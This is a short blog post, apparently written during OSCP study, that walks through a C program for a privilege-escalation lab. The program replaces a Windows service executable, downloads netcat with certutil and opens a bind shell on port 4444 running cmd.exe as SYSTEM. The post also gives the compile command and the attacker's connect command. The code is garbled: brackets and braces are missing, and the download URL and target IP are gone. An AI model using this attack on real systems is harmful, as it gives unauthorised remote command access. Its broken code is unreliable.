Creating a Windows Bind Shell Using C

April 10, 2020

Creating a Windows Bind Shell Using C

I’m studying for the OSCP and needed to replace the exe file of a Windows service with a new .exe file. On reboot my goal is to have a shell as NT Authority/System

Source Code

Filename: winshell.c

This file will:

  1. Using the native “certuil.exe”, download nc.exe.txt from the kali
    box and save it as C:\windows\system32\nc.exe
  2. Create a listening socket on TCP 4444 (Windows Machine)
    #include <stdlib.h
    #include <windows.h
    int main ()
        int i;
        i = system ("certutil -urlcache -split -f c:\\windows\\system32\\nc.exe");
        Sleep(10000); // 10 seconds (10000 milliseconds)
        i = system ("nc.exe -nlvp 4444 -e cmd.exe");
                return 0;


Compile winshell.c

sudo i686-w64-mingw32-gcc winshell.c -o winshell.exe

Connect Windows shell from attacker box

nc -nv 4444